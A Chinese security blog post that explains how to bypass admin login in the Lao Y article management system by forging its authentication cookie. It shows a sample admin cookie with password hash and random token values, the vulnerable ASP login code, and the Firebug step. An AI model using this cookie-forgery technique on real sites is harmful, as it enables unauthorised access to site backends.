MENU

老Y文章管理系统Cookie伪造

June 15, 2011 • Security

老Y的MD5是取32位MD5其中19位,所以根本破解不了的,但是老Y用的是cookie认证,所以根本不需要破解md5,直接伪造cookie进后台即可

UserID=1&UserPass=f7820f85727a6a9cc23&UserName=admin&AdminRndPass=b76a6e1fb7b6e0aafb1bcea1c8608b59

上面的是cookie,但是老Y还有个ranpass值,这个值很坑,没有这个值也是进不了后台的

dim adminname,adminpwd,adminip
 
if request("action")="adminlogin" then
adminname        =CheckStr(trim(Request.form("adminname")))
adminpwd        =CheckStr(trim(Request.form("adminpwd")))
adminpwd        =Mid(md5("laoy"&adminpwd,32),11,19)
adminRndPassword        =md5("l"&"a"&"o"&"yadmin"&RndNumber(1,9999999999),32)
 
mycode = trim(request.form("code"))
        if adminname="" or adminpwd="" then
        Call Alert("请输入用户名和密码!",-1)
        end if
        if mycode<>Session("getcode") then
        Call Alert("请输入正确的验证码!",-1)
        end if
         
set rs=server.createobject("ADODB.Recordset")
sql="select * from ["&tbname&"_Admin] where Admin_Name='"&adminname&"' and Admin_Pass='"&adminpwd&"'"
rs.open sql,conn,1,3
If Not rs.Eof Then 
   Session("YaoContent")=""
   Response.Cookies("LaoYAdmin").path=SitePath
   Response.Cookies("LaoYAdmin")("UserID")=rs("ID")
   Response.Cookies("LaoYAdmin")("UserPass")=rs("Admin_Pass")
   Response.Cookies("LaoYAdmin")("UserName")=rs("Admin_Name")
   Response.Cookies("LaoYAdmin")("AdminRndPass")=adminRndPassword
   'Response.Cookies("LaoYAdmin").Expires=Date+1
   rs("Admin_Time")                = Now
   rs("Admin_IP")                = GetIP
   rs("AdminRndPass")        = adminRndPassword                         
   rs.update
   response.Redirect "Index.asp"
else       
   Call Alert("您输入的用户名或密码不正确!",-1)
end if
rs.close
set rs=nothing
 
end if

上面代码逻辑是要求先输入管理员的账号密码 校验账号密码对了以后 将生成的一个adminRndPassword MD5值update到数据库中 所以不但要有管理员的pas ,还要有ranpass才能进入后台

有了这两个值就可以直接用firebug伪造一下cookie就进去了

Archives QR Code
QR Code for this page
Tipping QR Code
Leave a Comment